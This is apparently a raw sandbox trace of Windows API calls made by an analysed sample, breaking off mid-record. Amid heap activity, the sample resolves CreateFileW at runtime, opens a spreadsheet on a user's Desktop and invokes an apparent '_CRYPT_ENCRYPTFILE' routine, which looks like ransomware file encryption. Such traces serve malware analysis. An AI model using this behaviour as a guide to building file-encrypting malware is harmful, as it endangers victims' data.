0x43e2660 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0124.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0124.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0124.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0124.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0124.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0124.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0124.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0124.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0124.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0124.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0124.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0124.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0124.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0124.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0124.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0124.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0124.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0124.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0124.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0124.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.115] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0124.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0124.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0124.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0124.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0124.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca7c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0124.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0124.115] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0124.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0124.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0124.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0124.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0124.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0124.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0124.116] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mA8Gl8nzr8.xlsx" (normalized: "c:\\users\\fd1hvy\\desktop\\ma8gl8nzr8.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0124.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0124.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0124.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0124.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0124.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0124.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0124.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0124.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0124.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0124.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0124.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0124.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0124.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0124.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0124.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0124.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0124.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0124.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0124.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0124.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0124.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0124.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0124.118] FreeLibrary (hLibModule=0x772d0000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0124.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.119] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.119] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0124.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0124.120] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0124.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0124.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0124.121] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0124.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ce0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0124.122] CloseHandle (hObject=0x2a0) returned 1 [0124.122] FreeLibrary (hLibModule=0x772d0000) returned 1 [0124.122] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0124.122] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\mA8Gl8nzr8.xlsx", lpFindFileData=0x144ed28 | out: 